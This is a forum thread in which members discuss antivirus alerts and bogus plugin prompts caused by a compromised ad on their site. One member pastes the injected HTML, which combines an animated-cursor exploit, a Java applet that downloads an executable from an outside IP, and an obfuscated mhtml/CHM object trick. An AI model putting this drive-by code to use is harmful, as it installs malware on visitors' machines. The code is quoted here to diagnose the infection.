Virus Alert

[Latch]

I'm getting Virus warnings from Nortons about a few trojans this morning. You would have all gotten emails, but it effected me firstly FF, but now IE as well.

I don't know why I'm typing this, since if you can read it, you too would have virus alerts going off everywhere.

Anyway, you've all been warned. I won't be back here until Norbs sends an all clear email out.

[w00dsy]

I have gotten 'missing plugin' requests from Firefox, but no plugin can be found. My AV hasn't picked up anything yet in any browser, IE6, IE7 or Opera. Norbs did a virus scan of the server host and it came up fine. so i have no idea what could be causing this, best bet is to make sure your AV is up to date, don't install anything if asked, and hopefully we can have this sorted out soon.

[Rots]

Missing Plugins for me too.

[ysu]

I could not just stand aside, of course, hehe first thing for me was to fire up firefox and see what's up

What I found....:
first: you don't have to worry, there's no auto-install on Firefox. just don't click on the install button. Even if you do, nothing seems to happen.
second:
this address, down the bottom, raises the need for the plugin:
(It's in an iframe)
http://65.19.154.20/adverts/07/1.php

very much looks like a counter code or similar, heres' the output:

Code: Select all

<html><head><title></title></head><body>
<style>
* {CURSOR: url("http://65.19.154.20/adverts/07/sploit.anr")}
</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://65.19.154.20/adverts/07/win32.exe'></APPLET>
<script>
try{
document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58&#47&#47&#67&#58&#92&#102oo.mht!'+'http://65.19.154.20//adv'+'erts//07//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');
}catch(e){}
</script>
</body></html>

I really don't want do dig into it any more, it's simpler to disregard or switch off than start and go into it.

by the way here's an article on a similar subject - or maybe the same:
http://www.edbott.com/weblog/archives/000562.html

If you're afraid, just use opera in the meantime.

by the way nod32 did not go off for me...

maybe the worst of the thing has been switched off in the meantime?

[YnoT]

yeah I got that virus alert too from Norton but it can't get rid of it

[GT VIRUS]

It wasnt me!

/runs

[Big Kev]

I've been away for the weekend. I'm back now. I'll get on it.

OK I know what it is and where it is but I can't get to it till Norbs is online.

[w00dsy]

It's fixed for me now. Good work Kev if you got rid of it.

[Jumi2]

I have blocked ads anyway so i didnt see that one popup.But as said before, you just dont install the plugin and nothing will happen in Firefox

[AstrO]

So are we all safe now?

[Bauer]

i no longer get the 'install plugins' banner on FF

[Big Kev]

Well i haven't actually touched anything yet!

It looks like sploit.anr is a javascript trojan. So, despite us being up to date on our forum software it looks like there's an exploit in it somewhere. Possibly through the google ads.

As soon as norbs gets back to me I'll check the database where I think the trojan is hiding.

[Threeps]

It is possible it could be in the login up in the top right corner. That section of the style is Java I think.

[w00dsy]

That's flash i think.

[ysu]

definitely flash. java does not have 'zoom in' in the menu :-)
plus: check the code :-)))

[Btd69]

Theres also a new one on msn.. nerds and pcs.. I say we go on a massicre slash rampage and hack em to death with rusty blades